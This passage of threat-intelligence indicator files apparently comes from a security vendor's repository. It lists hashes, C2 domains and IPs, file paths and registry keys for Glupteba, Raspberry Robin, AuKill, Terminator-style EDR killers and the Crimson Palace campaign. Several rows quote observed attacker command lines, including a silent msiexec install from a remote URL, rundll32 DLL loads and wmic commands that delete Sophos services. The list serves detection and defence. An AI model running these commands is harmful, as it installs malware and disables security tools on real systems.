sha256,5f6fec8f7890d032461b127332759c88a1b7360aa10c6bd38482572f59d2ba8b,Malicious driver signed by Beijing JoinHope Image Technology Ltd.,,,,,, 8 | sha256,601837510987c6ca31d755e12e7acbb80c541c4b1bd3fa01e9f518d0d024d6e0,Cuba ransomware DLL (a.dll) Troj/Ransom-GUI (not on VT),,,,,, 9 | sha256,64e23e15f4c57b6bd6e34250b099f2071307c402486b7fd6c9432a91fdb6eb59,driver loader (new_s.exe) Troj/AVKill-Q (not on VT),,,,,, 10 | sha256,6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 11 | sha256,7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 12 | sha256,8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 13 | sha256,9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c,"Malicious driver signed by Zhuhai liancheng Technology Co., Ltd.",,,,,, 14 | sha256,c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 15 | sha256,d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c,Malicious driver signed by nVidia Corporation,,,,,, 16 | sha256,4f94155e5a1a30f7b05280dd5d62c3410bcc52aea03271d086afa5dc5d97e585,driver loader (new_s.exe) Troj/AVKill-Q (not on VT),,,,,, 17 | sha256,e8eec2c2be6abdef6987d4a5ad850f17b335db242d5657a6f47733bf6a03dc03,driver loader (new_s.exe) Troj/AVKill-Q (not on VT),,,,,, 18 | -------------------------------------------------------------------------------- /Trojan-Glupteba: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note 2 | Description,Indicators from the Glupteba malware report,https://news.sophos.com/en-us/2020/06/24/glupteba-report/ 3 | bitcoin_address,15y7dskU5TqNHXRtu5wzBpXdY5mT4RZNC6,previously used for C2 updates 4 | bitcoin_address,1CgPCp3E9399ZFodMnTSSvaf5TpGiym2N1 ,previously used for C2 updates 5 | command_line_parameter,/31337, 6 | command_line_parameter,/31339, 7 | command_line_parameter,/31340, 8 | domain,1.podcast.best, 9 | domain,anotheronedom.com,"C2 server, 2020-02-17" 10 | domain,bestblues.tech,CDN server (payloads) 11 | domain,easywbdesign.com,"C2 server, 2020-05-07" 12 | domain,gamedate.xyz,winboxscan.exe C2 server 13 | domain,getfixed.xyz,"C2 server, 2020-03-28" 14 | domain,gfixprice.xyz,"C2 server, 2020-03-28" 15 | domain,maxbook.space,"C2 server, 2020-05-13" 16 | domain,robotatten.com,"C2 server, 2020-01-24" 17 | domain,sleepingcontrol.com,"C2 server, 2020-02-14" 18 | domain,sndvoices.com,"C2 server, 2020-04-08" 19 | domain,whitecontroller.com,C2 server 20 | domain,myonetime.top,C2 server 21 | domain,venoxcontrol.com,"C2 server, 2019-06-19" 22 | domain_path,myonetime.top/w.php, 23 | file_path,%APPDATA%\EpicNet Inc\CloudNet, 24 | file_path,%TEMP%\csrss\, 25 | file_path,%TEMP%\csrss\smb\, 26 | file_path,%TEMP%\wup, 27 | file_path,%WINDIR%\rss, 28 | file_path,%WINDIR%\rss\csrss.exe, 29 | file_path,%WINDIR%\windefender.exe, 30 | file_path_name,"""%TEMP%\csrss", 31 | file_path_name,%APPDATA%\EpicNet Inc\CloudNet\cloudnet.exe, 32 | file_path_name,%TEMP%\app.exe, 33 | file_path_name,%WINDIR%\System32\drivers\Winmon.sys, 34 | file_path_name,%WINDIR%\System32\drivers\WinmonFS.sys, 35 | filename,cloudnet.exe, 36 | filename,dsefix.exe, 37 | filename,e7.exe, 38 | filename,windefender.exe, 39 | filename,Winmon.sys, 40 | filename,WinmonFS.sys, 41 | filename,WinmonFS32.sys, 42 | filename,WinmonFS64.sys, 43 | filename,WinmonProcessMonitor32.sys, 44 | filename,WinmonProcessMonitor64.sys, 45 | filename,WinmonSystemMonitor-10-64.sys, 46 | filename,WinmonSystemMonitor-7-10-32.sys, 47 | filename,WinmonSystemMonitor-7-64.sys, 48 | filename ,deps.zip, 49 | mutex,Global\h48yorbq6rm87zot, 50 | mutex,Global\Mp6c3Ygukx29GbDk , 51 | mutex,Global\nbyjrjaxyahi4pq5,Set by Winboxscan MikroTik router exploit tool 52 | mutex,Global\wupEvent31337, 53 | mutex,Global\xneEvent31337, 54 | mutex,Global\y7ze3fznx1u0yc2z, 55 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\InstallKey,%s here refers to the user's SID under Windows 56 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\RegisterAppOk ,%s here refers to the user's SID under Windows 57 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\RegisterAppProcessing,%s here refers to the user's SID under Windows 58 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\TestApp,%s here refers to the user's SID under Windows 59 | SHA-256,73fddd441a764e808ed6d6b8f3d0d13713e61221aa3cfef7da91cdaf112fe061,"deprecated, vulnerable VBoxDrv.sys driver version 1.6" 60 | SHA-256,414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 ,"DSEFix.exe (grey hat tool from https://github.com/hfiref0x/DSEFix, benign)" 61 | SHA-256,04d71e8af8b5cbec912b82b6ebef7c19c5b888873dfd4609b1e38b2a6c398b2e,watchdog.exe 62 | SHA-256,0b2a84359501923d1aa6ccd4e03b3f1b619e01d978efae45feea34a4d0ffed04,cloudnet.exe 63 | SHA-256,20e983e90144c385996eeb2edb584d654d898c34725e149682170f870ee12870,vc.exe 64 | SHA-256,407c70f0c1a1e34503dae74dd973cf037d607e3c4deb8f063d33f2142f1baf71,app.exe 65 | SHA-256,6b0d90a0571ec870fa26372a1c5d83d06e8febca130a8f710e0c389a3054e05c,routerdns.exe 66 | SHA-256,83bbe9e7b7967ecbc493f8ea40947184c6c7346c6084431fceea0401a6279d29,app.exe 67 | SHA-256,8d19c59db26a3e0a3251c5f05e143558bf009ed0b46fb9b6151f98441407ae8b,winboxscan-0502.exe 68 | SHA-256,5e541d1ab46ab3d58e4889b08f5f4427d38afe8320582a63d992eda172af6c7f,profile-0225.exe 69 | SHA-256,9e4f09faee3eba3ae271b241cbaf0cb3621845ef83608a8abb3df8791e6c36e1,d2.exe 70 | SHA-256,dec11036bca8384f81c0c1d534e1f37fd2864c974dad020f32b835af3c7c4e28,updateprofile.exe 71 | SHA-256,eb35bb221de38f5953f923cd349b4c85a50145329152a8aaa01e4cd8602a560e,cloudnet.exe 72 | SHA-256,469953521e9b64eac07f02fecf3488406c65ec1f3d5c182363c8ba0664a4b640,"patch.exe (grey hat tool from https://github.com/hfiref0x/UPGDSED, benign)" 73 | url,http://1.podcast.best/ru53332/,RTMD in URI 74 | url,http://capmusic.ru/ru53332/,RTMD in URI 75 | url,http://fundbook.xyz/ru53332/,No string ID in URI 76 | url,http://hotaction.online/ru53332/,No string ID in URI 77 | url,http://netoftime.com/ru53332/,RTMD in URI 78 | url,https://hotbooks.xyz/ru5555/,FMLD in URI 79 | url,https://infocarnames.ru/ru53332/,RTMD in URI 80 | url,https://maxbook.site/ru5555/,FMLD in URI 81 | url,https://setbird.website/ru53332/,RTMD in URI 82 | url_path,%s/upload/%s/samples/,%s here refers to the unique identifier the bot assigns to the infected host 83 | url_path,/api/cloudnet-url?, 84 | url_path,/api/install--failure, 85 | url_path,/api/router-scan-results-rand, 86 | url_path,/app/app.exe, 87 | url_path,/app/watchdog.exe?t=, 88 | url_path,/ru53332/, 89 | url_path,/ru5555/, 90 | -------------------------------------------------------------------------------- /Worm-Raspberry-Robin.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to recent Raspberry Robin infections, 3 | domain_port,5qY.ro:8080,Compromised QNAP server used for C2 4 | url_path,hxxp://5qY.ro:8080/y/cB36RUcKfQKp7SE/oolvooA/p8a/{redacted},URL path used for installation 5 | command_line,"C:\Windows\System32\rundll32.exe"" SHELL32 ShellExec_RunDLL regsvr32.exe -s ""C:\ProgramData\Wwhm\vsinzf.log","Example command to load DLL without odbccong, instead only using regsvr32 in a straightforward manner" 6 | command_line,RUNDLL32.EXE C:\ProgramData\EdgeProt\StqrtedRest\AM51edoos_x86.dll FXJooft_hhmme,Observed Raspberry Robin DLL commandline 7 | command_line,RUNDLL32.EXE C:\ProgramData\FilterBoard\NomorPrtfession\sdiabeft_Vibm02.dll Rqstfo_Web_Ryutclt,Observed Raspberry Robin DLL commandline 8 | command_line,"C:\Windows\system32\rundll32.EXE C:\ProgramData\GenericMicro\UriloFeatkres\mxiDaas_Pkrces.dll,ROUTnteh__1_0",Observed Raspberry Robin DLL commandline 9 | command_line,"C:\Windows\SysWOW64\RUNDLL32.EXE C:\ProgramData\WrapAlarm\EnqerprispSxory\tdawty_CredeDEAS.dll,Devce_AdmTxplEditxf_Resohrqeh",Observed Raspberry Robin DLL commandline 10 | command_line,"RUNDLL32.EXE C:\ProgramData\ComponentsImport\GutlookGate\ades_pbouril.dll,wmsksoft_PoCZ5",Observed Raspberry Robin DLL commandline 11 | command_line,C:\Windows\SysWOW64\RUNDLL32.EXE C:\ProgramData\GuardShade\UtilitdRlset\dpset_CXVR32.dll CFBBRw_wisdoker,Observed Raspberry Robin DLL commandline 12 | command_line,"msiEXEC UwAAbX=shmf WRdYMn=aFRmAyQL /q iUde=ODJhzS YDLyOBy=LteB YJbgE=HpiaCV /i""hxxP://5qY[.]Ro:8080/y/cB36RUcKfQKp7SE/oolvooA/p8a/{redacted}"" kFTIeNctT=InnOjRO",Example of Raspberry Robin installation command 13 | -------------------------------------------------------------------------------- /Zemana-driver-IoCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2024/03/04/itll-be-back-attackers-still-abusing-terminator-tool-and-variants,Observed IOCs for incidents involving Zemana drivers 3 | sha256,397eb84bfebb366c2719c02bbadfdf9de8ef608808d680c9f127f9a62ccca083,ter.exe 4 | sha256,6f55c148bb27c14408cf0f16f344abcd63539174ac855e510a42d78cfaec451c,Anti-Logger driver used by ter.exe 5 | ip,175[.]118[.]126[.]65,Server hosting malicious PowerShell script 6 | sha256,c3e6034ee65a1131068998399f110d0c944686683197b607c5598e9c09af1c39,Cryptominer installer 7 | sha256,6e2d85628ae37e57365ed59ac30371d86ab3b62acd5d0dfb6cbd0ccc6c4e5c1a,Ternimator.exe 8 | sha256,2bbc6b9dd5e6d0327250b32305be20c89b19b56d33a096522ee33f22d8c82ff1,Zam.sys used by Ternimator.exe 9 | sha256,c748b9054a97a00db5484a98b1841b3c92881c96989d492586206e0970be3b4b,Anti-Logger driver used in AuKill incident 10 | sha256,3c54646213638e7bd8d0538c28e414824f5eaf31faf19a40eec608179b1074f1,XMRig Miner 11 | ip_port,175[.]118[.]126[.]65:8002,Server hosting malicious PowerShell script 12 | url,hxxp://175[.]118[.]126[.]65:8002/js/wi.txt,Server hosting malicious PowerShell script 13 | command_line,"wmic service where \""PathName like '%sophos%'\"" call delete /nointeractive",Attempt to delete Sophos services 14 | command_line,"wmic service where \""PathName like '%sophos%'\"" call stopservice /nointeractive",Attempt to stop Sophos services 15 | file_path,%sysdir%\drivers\updatedrv.sys,updatedrv.sys (ZAL) 16 | file_path,\programdata\usoshared\updatedrv.sys,updatedrv.sys (ZAL) 17 | -------------------------------------------------------------------------------- /atk-backstab-d.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver,Indicators related to this research 3 | sha256,1934b4641ca540ac4fd39c37e6f8b6878ddf111b5c8eb2de26c842cb6bd7b9b8,AuKill v1. Build timestamp 11/13/2022 9:07:47 AM. Targets Sophos 4 | sha256,83a17f3fda45b00e34934ddd0d5ed72c479170cb39097938f07a5dc6e92068c3,AuKill v2. Build timestamp 11/29/2022 5:58:14 AM. Targets Sophos 5 | sha256,761330a5e5b16f27fef971e1f41d309ee9f5f158dd09e81b2b31cda6dafa59f0,AuKill v3. Build timestamp 12/14/2022 10:19:33 AM. Targets Sophos/ElasticSearch 6 | sha256,08a248de098e0f9edec425ce37d13c827eaf4c54c93182f4ddf1c5b3801cf540,AuKill v4. Build timestamp 2/6/2023 6:09:19 PM. Targets Sophos/Microsoft/Splashtop 7 | sha256,a780972312e2644f29555ec9275053eebce37befe038eabaeb783443209bc921,AuKill v5. Build timestamp 2/10/2023 9:59:47 PM. Targets Sophos/Microsoft/Aladdin HASP 8 | sha256,7bca36f037557b0f84412a666ef76dee8bfec1bc7754112b95f34634b8b72fed,AuKill v6. Build timestamp 2/11/2023 1:43:12 PM. Targets Sophos/Microsoft/Splashtop 9 | sha256,d579b1853c528e54464c2607e559591ee01b0ab75bc016c14de1c38068328a81,WindowsKernelExplorer.sys (64-bit driver that ships with the original tool) 10 | sha256,db0b5c434ddc7c97505a8be24431e9fbe484c2113df4ddf061aee91c35eab8b6,WindowsKernelExplorer.sys (32-bit driver that ships with the original tool) 11 | sha256,52b9a7b44154bbb9d81a581a7de4902b1c661559ea87803d9cb85339805bd6ca,WKE32.exe 12 | sha256,79357c9248aea61fa25f0641f2eeb13bb259da645ab2e8dd696b702ed4fa976b,WKE64.exe 13 | sha256,cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc,Process Explorer v16.32 driver (deprecated) 14 | file_path_name,c:\Windows\System32\drivers\PROCEXP.SYS,Process Explorer v16.32 driver (deprecated) 15 | file_path_name,c:\windows\system32\aSophos.exe,AuKill v2 path 16 | file_path_name,c:\windows\system32\aSophosX.exe,AuKill v3 path 17 | file_path_name,c:\windows\system32\auSophos.exe,AuKill v4 & v6 path 18 | file_path_name,c:\windows\TEMP\aBase.exe,AuKill v5 path 19 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDriverSrv,AuKill v1 service key 20 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aSophos,AuKill v2 service key 21 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aSophosX,AuKill v3 service key 22 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\auSophos,AuKil v4 & v6 service key 23 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aBase,AuKill v5 service key 24 | -------------------------------------------------------------------------------- /crimson_palace_post-08-2023.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | sha256,58a7be39056c2084bbb4aec9843db732dfe115ec4ee0c7cc4cf8884621b5142d,C:\ProgramData\mios.exe (Malicious File) used in conjuction with cmdline containing '172.19.120.60 65211' and '178.128.221.202 443' 3 | sha256,776d427a19d8389464f855b2f70e0ac11e896162a9f9b50bcb23f0f0aea5044f,C:\Windows\Help\Help\mscorsvc.dll (Malicious DLL) 4 | sha256,430bf24c9a7843895cb266b440c1f911ae600a7e6b8f3885d1c000622da52b2b,C:\ProgramData\mscorsvc.dll (Malicious DLL) 5 | sha256,a22b8ef40b8abe2bd7161f425484e82207f322fef1d0562de5bf98e2f642b477,"C:\Windows\Temp\ntpsapi.dll (EDR unhooking, benign version of ntdll.dll)" 6 | sha256,cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272,C:\windows\syswow64\WWindows.Data.Devices.Config.dll (SharpHound/BloodHound) 7 | sha256,e65645af3894ec55f0b55472302d288e860a10d97bc19b699facc400f778c4ee,locale.nlp (ATK/DonutLdr-A) 8 | sha256,fa7d4fb4b43e1672c7f4656cd4275c330c2e13aff8451d68e4f305e5e5aea395,C:\Windows\debug\net.LOG (Havoc) 9 | sha256,52e248b9fb32ac3aaa4be4b41c66f1e7d9f2d4605aae98f20584f21ea1f33202,swprv.dll (Malicious DLL sideloaded by swprv service) 10 | sha256,e5620b4b6371b786c72e830dc24012354642b7067bd5902da7073ce0421456b7,iscsiexe.dll (MSiSCSI payload) 11 | sha256,6d94049b24c6ac2373d3b517515fcaeeb392458342bbb5ad4c4316e124805b5b,version.dll (Malicious DLL sideloaded by swi_update.exe) 12 | file_path_name,c:\windows\help\help\tmdbglog.dll (,Malicious DLL sideloaded by PTWatchDog.exe 13 | sha256,3cc8e21798462468d3bc05ddef35a558fe0dff268c433d42bd01385155084f53,"DecrptDumper.exe (Malicious File, no execution data)" 14 | sha256,da9a53ff7486cf128e5ba80e66fcf3b1d8993d553bd9634ae8e90cbab31fd8da,c:\windows\help\prow.xml (Havoc) 15 | sha256,8b16a3a3047f0eb93ef2b55613a76a9f5f19506428895a5ffbb3c1c44780aad7,~docpdf.tmp (Havoc) 16 | sha256,75403191ee834075ab5334e92bda8aab267545a03ed5ed3508db36f21f4acf50,C:/PerfLogs/libcef.dll (Havoc) 17 | sha256,609fc96700f49f7fdfa71248e642a4dfcd8b3d35f6da3b7c2ce7daad25a844a9,DOC20231100001603KMAP.pdf (webshell) 18 | sha256,e4b7a1372233aef6d495743bb726fcd5037d4e90e043085498c21587335d36c7,C:/Windows/System32/wbem/ncobjapi.dll 19 | sha256,5f959f480a66a33d37d9a0ef6c8f7d0059625ca2a8ae9236b49b194733622655,DOC20231200001924KMAP.aspx 20 | sha256,bdcedd81555c9c2eb9f4329626c27ec8c7b91a0f2a9f6e0c55dbcd3f99e82b5d,111 (Shellcode loader) 21 | sha256,4995b91badc8f9bf549548a734d3c14fa2a1c21080743484028b5362440808a0,C:/Windows/Vss/Writers/Application/libcef.dll (Shellcode Loader for Havoc) 22 | sha256,4dd0debf03eeb938fbaca1f1fd391523358c23cbf18959a149c29133cc3c9cae,C:/Windows/Vss/Writers/Application/libcef.dll (Shellcode Loader for Havoc) 23 | sha256,101bf8dcdd414f09ba46cdecbd96e8606c79b0e76b6a2ce040395e775cb4da86,DOC20231200001922KMAP.asp (webshell) 24 | sha256,9ccf0e46f6aadbb20f4c269d8ac85cc9b4e6ce56bf226d45eda4347a20785c88,DOC20231200002062KMAP.php (webshell) 25 | sha256,1622ef497f2b767a43e25bcd9a9a629cbe7bed49cb27dc4f08fe0863730580d9,log.ini (Havoc) 26 | sha256,5f959f480a66a33d37d9a0ef6c8f7d0059625ca2a8ae9236b49b194733622655,DOC20231200001919KMAP.aspx (Webshell) 27 | sha256,101bf8dcdd414f09ba46cdecbd96e8606c79b0e76b6a2ce040395e775cb4da86,DOC20231200001923KMAP.asp (Webshell) 28 | sha256,5f959f480a66a33d37d9a0ef6c8f7d0059625ca2a8ae9236b49b194733622655,DOC20231200001924KMAP.pdf (Webshell) 29 | sha256,5298c1aadac203285c8a95a4e3f62ec14b984729bf768a405c8028291e34fe1b,1.exe (Invoke WMI) 30 | sha256,299b1e82f6941cc049a16c7854230fb37c97af32e2cf5cb335495f42446dc43f,"msedge_elf.dll (Shellcode Loader, Havoc)" 31 | sha256,c36173f28bfd99db86533d5fdb0ce4dd565488ca56d4b9df1997ee9201b3b704,"chrome.exe (Shellcode Loader, Havoc)" 32 | sha256,8d54da0f807d771edb1197e463cdff8848651e14745c4c468386c31953c340ff,"msedge_elf.dll (Shellcode Loader, Havoc)" 33 | sha256,71ccc2c30dc43f20833c3e54d1fe86f8b68263d876461a3f7f7f8702e92cbe81,C:/ProgramData/conhost.exe (Alcatraz Git Project EDR Evasion) 34 | sha256,d86790104f59b89edbdb1478f320d4589155d465d4710bcb57ff015383eefb38,C:\Windows\Vss\Writers\Application\libcef.dll 35 | sha256,2892aa48e12e72ba25c4caa9471b41ce316624ff98ed79f56e3c6b3a51026504,C:\Windows\Vss\Writers\libcef.dll 36 | file_path_name,C:\Windows\Vss\Writers\log.bin, 37 | sha256,2b7602cc1521101d116995e3e2ddfe0943349806378a0d40add81ba64e359b6c,C:\PerfLogs\vcruntime140.dll 38 | sha256,c6e1bf2b7ac0fd3c34761099d2ec17fccd0604e2e62e94f297943260d15368ce,C:\PerfLogs\jli.dll 39 | file_path_name,C:\Windows\Temp\temp.log, (Shellcode loader) 40 | sha256,b32de9f4f2a9bd08063c72fa84d5d44be5a3bf7859bfb6ceaf093cd03ff0240f,C:\PerfLogs\pt.exe (unsigned executable with certificate stating that it is MS Edge) 41 | sha256,f30b04a9ebc95c50fdc116260068d4d8da8005104b6366c29d0f24dbbf798957,C:\Users\Public\r2.exe (Unknown threat file) 42 | sha256,c36173f28bfd99db86533d5fdb0ce4dd565488ca56d4b9df1997ee9201b3b704,"C:\Users\Public\chrome.exe (Shellcode loader, WIN-PROT-VDL-MALWARE-ATK-SCLOAD-Q)" 43 | sha256,fbe0851792629f86b1d5a599a6bc29d82b3248462bebd8e47ee698e4f510308f,C:\PerfLogs\msedge_elf.dll 44 | ip,178.128.221.202,mios.exe C2 45 | domain,gsenergyspeedtest.com,Cobalt Strike C2 46 | ip,192.142.18.15,Interacted with webshell (VPN subnet) 47 | ip,192.142.18.27,Interacted with webshell (VPN subnet) 48 | ip,192.142.18.25,Dropped webshell (VPN subnet) 49 | domain,hpupdate.net,Havoc C2 50 | url,https://www.hpupdate.net/us-en/drivers/printers,Havoc C2 URI 51 | ip,45.15.143.151,Havoc C2 52 | ip,198.244.237.13,Havoc C2 payload host 53 | ip,123.253.35.100,swprv.dll C2 54 | domain,cancelle.net,swprv.dll C2 55 | domain,dmsz.org,swprv.dll C2 56 | domain,gandeste.net,swprv.dll C2 57 | ip,103.56.5.224,swprv.dll C2 58 | ip,49.157.28.114,swprv.dll C2 59 | ip,103.56.5.224,swprv.dll C2 60 | ip,141.136.44.219,Havoc C2 61 | ip,145.14.158.235,Havoc C2 62 | ip,107.148.41.114,Havoc C2 63 | ip,66.42.56.233,Havoc C2 / XiebroC2 64 | domain,test1.zhangliyong.cn,Havoc C2 / XiebroC2 65 | ip,191.96.53.132,Havoc C2 / XiebroC2 66 | ip,45.9.191.183,Havoc C2 / XiebroC2 67 | ip,64.176.50.42,Havoc C2 / XiebroC2 68 | ip,191.96.53.132,Havoc C2 69 | ip,45.77.46.245,Havoc C2 70 | ip,"64.176.37.107 71 | ",Havoc C2 -------------------------------------------------------------------------------- /crimson_palace_prior_intrusions.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | sha256,cca5ae87cd710a8fbf994addb0abc8bf1deb222214d4831289885de23ca98924,textinputhost.exe (renamed rc.exe) 3 | sha256,c1bec59afd3c6071b461bb480ff88ba7e36759a949f4850cc26f0c18e4c811a0,TextInputHost.dat 4 | sha256,f682323a2c543abbe12c21a77ee93b49444381fa33f76c67363c84764ca4c675,sc.cfg 5 | sha256,506b21588541243f3ddd5acb759bf20a3bf06fd2fea455066866154bc5e59721,appmgmt.dll (Stowaway) 6 | sha256,4ae29b8124f6221dab934ac04afed2acc8b17c6b35120d568bad8658cbca01c6,check.exe (NUPAKAGE) 7 | sha256,56F0C8047203147D9B9A888EBAC8F33B14AE198182A13913A0F93652DFE2052A,appmgmt.dll (Stowaway) 8 | sha256,b708dd11942c3e87a8987bdf83f7ea603425ae75fc25a306f54f1087df4198b4,swprvs.dll 9 | sha256,f830c3771d35237b4a63b946d7a0d187f5aaa4240e965d74070b7d72b6fba210,winbridge.dll -------------------------------------------------------------------------------- /crimson_palace_stac1248-alpha.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,, 2 | sha256,110c5eec940f3abb8b3a671cd292bc9ef65772168325a7949290e9828353824a,sslwnd64.exe (PhantomNet),,,, 3 | sha256,e9cb02690d987de8d392d0e24b3ccbb294c751dff73962135913c7ec0d8a8064,sslwnd64.exe (PhantomNet),,,, 4 | sha256,c1abc254d231574044ffe7bdd030be04618916f255396197f1151bfec98c04b6,nethood.exe (PhantomNet),,,, 5 | sha256,e8cd237ac43fa0505d858ac8eb800020eeca104a1cd931d3b6d0ef656ee5393d,oci.dll (PhantomNet),,,, 6 | sha256,173bb620ed2eee6b356e128da88e173eb1b69253ecd616f8f984087688c089fd,"X64.dll (PhantomNet, renamed to oci.dll)",,,, 7 | sha256,c06065d3de3bfb37168a5d94baf1c675f831a201937ef774a36c2ea2bf6fc49e,wlbsctrl.dll (EAGERBEE),,,, 8 | sha256,b05b92fd84cc3e3bd6378cadbe9b8b2cb926c42383e6194be1df44d1b9202fc1,TSVIPSrv.dll (EAGERBEE),,,, 9 | sha256,951c7f8fdb6cfc8b362615ab1eec4a07dc8fccfd3a7ecda8255908a93b6a1f21,TSVIPSrv.dll (EAGERBEE),,,, 10 | sha256,01544aeb502163c4fb7bac483430059183ce3d11aee78cd4a6c7074c5289540e,C:\ProgramData\Microsoft\DeviceSync\jli.dll (EAGERBEE),,,, 11 | sha256,47c4a62fe75aa62906f0b110668e17947e905a33759100de21b987879b47183b,C:\ProgramData\Microsoft\Vault\vmnat.dll (Merlin),,,, 12 | sha256,7ed44a0e548ba9a3adc1eb4fbf49e773bd9c932f95efc13a092af5bed30d3595,pc2msupp.dll (Malicious DLL sideloaded by MOBPOPUP.exe),,,, 13 | sha256,f499f8d9584e5f4474b19324b807a38fec1c1d38d5df2ff4c1e16798311bc25b,MSI64.exe (RUDEBIRD),,,, 14 | sha256,68ee8c2209641a6796e06caa115effcb89f722a5737210b5bebb87a36e5141a8,ba0oddof.dll (CSC compilation artifact from 1.ps1 execution),,,, 15 | sha256,9404f51ccaf4165e6add08344f04b90ae79a045814d6b1de6b6c1e30981faa78,SophosUD.exe (PowHeartBeat),,,, 16 | sha256,0e010a36ff24299592569f7c3fc01c597e158996d94b66eb3bbf757742663e76,SophosUD.exe (PowHeartBeat),,,, 17 | sha256,1b97afb3310b3af944f74c2d715c110cec32ec536c0a9837b8c88df3438b2a63,SophosUD2.exe (PowHeartBeat),,,, 18 | sha256,2a662b58f1dd229e7dba923a4d123658e3c10c0cfcec03748fbe577db81db34d,SensAPI.dll (Malicious DLL sideloaded by ph.exe),,,, 19 | sha256,bbc0fe549a9e902528a125abd13b1f7c53746416d9c9bb91f88877f37a4ce11c,"C:\ProgramData\Microsoft\Windows\svcchost.dll (Malicious DLL sideloaded by renamed vmnat.exe, svcchost.exe)",,,, 20 | domain,cloud.keepasses.com,Merlin C2,,,, 21 | ip,89.44.197.74,Merlin C2,,,, 22 | domain,scancenter.trendrealtime.com,RUDEBIRD C2,,,, 23 | ip,185.195.237.123,RUDEBIRD C2; EAGERBEE C2,,,, 24 | ip,195.123.247.50,RUDEBIRD C2,,,, 25 | ip,172.67.130.71,PhantomNet C2,,,, 26 | ip,45.90.58.103,PhantomNet C2; RUDEBIRD C2,,,, 27 | ip,185.195.237.121,PhantomNet C2,,,, 28 | ip,104.21.3.57,PhantomNet C2,,,, 29 | ip,185.82.217.164,PhantomNet C2,,,, 30 | ip,195.123.245.79,PhantomNet C2,,,, 31 | ip,associate.feedfoodconcerning.info,PhantomNet C2,,,, 32 | ip,associate.freeonlinelearningtech.com,PhantomNet C2,,,, 33 | ip,msudapis.info,PowHeartBeat C2,,,, 34 | ip,154.39.137.29,PowHeartBeat C2,,,, 35 | ip,147.139.47.141,PowHeartBeat C2,,,, 36 | ip,185.167.116.30,PhantomNet C2; EAGERBEE C2,,,, 37 | ip,associate.freeonlinelearning.com,EAGERBEE C2,,,, 38 | ip,91.220.202.143,EAGERBEE C2,,,, 39 | ip,139.162.18.97,dllhost.exe,,,, 40 | -------------------------------------------------------------------------------- /crimson_palace_stac1305_charlie.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes, 2 | sha256,f788d5c2c1bb2d88db09b727b3841155daf43ba81802b5faffec72640451fa4f,tpyrced_ambs.exe, 3 | sha256,ad346007f28c4b6d409c95f55e750e249db4b168cd7061baa128f826df948e10,443.txt (PocoProxy), 4 | sha256,1ad26a31c5387055610e053dbab8355e1371f89dfa37526f7a3341122526b719,4413.txt (PocoProxy), 5 | sha256,91f40e8659da3dbbb22497b317aa37f26403be86662e359ecddcb4a0c72e154c,chrome.log (PocoProxy), 6 | filename,aaaa.txt,PocoProxy, 7 | sha256,7d6209036d370dbce7a0657f35dedeaa59c15fcfb4d696b9ebdd0fcc773dad50,a8.txt (PocoProxy), 8 | sha256,34294ff52899a63f2dc02e5a8f1488343afdb9702437d409a0869317ccfb4243,s.dat (Malicious file), 9 | sha256,5f3fd50715aabf43cc6edb5f38026a3baa37a7fd7a17ae232fc65e186c83befb,msedge_elf.dll (HUI Loader), 10 | sha256,4fcbc598c5699ea48a1edd8dda065eab210f09ad900ab167cb5abdf9841dd2b7,hideschtasks.exe (Custom binary; remotely creates scheduled tasks), 11 | sha256,755b14ad83da2f2eff8ef8bf83ed74c6d96f6b3b3fde95d4c13d8cb75d861631,log.ini (Masquerading DLL generating C2), 12 | sha256,44e0c61f70f44e3a35ecde9b49a623973727d3aa68922ef4e1ff8dfc74795582,11.log (LSASS credential interceptor), 13 | sha256,a1a8adae91daa96deb01326c702fec388d0fa983f299de3f1bdb8a277df64423,1.dat (Cobalt Strike), 14 | sha256,3a85c36fff48b223f6edd722bc1603a1fd9b00d3e4d46a88151c4b1b696d90d1,sssa.exe (Malicious file), 15 | sha256,62c9b97a849f40f4b5b167b96a54fa1ef03624ac8f2972b641af8ca5d00b5db0,McPvNs.dll (Malicious DLL sideloaded by McPvTray.exe), 16 | sha256,c1d818f18c7160807d9031e024fcc6429476d6455221e3aa988c6245269fbcc8,"rsndispot.sys , EDR evasion", 17 | sha256,ea8c8f834523886b07d87e85e24f124391d69a738814a0f7c31132b6b712ed65,"rspot.sys, EDR evasion", 18 | ip,198.13.47.158,PocoProxy C2, 19 | 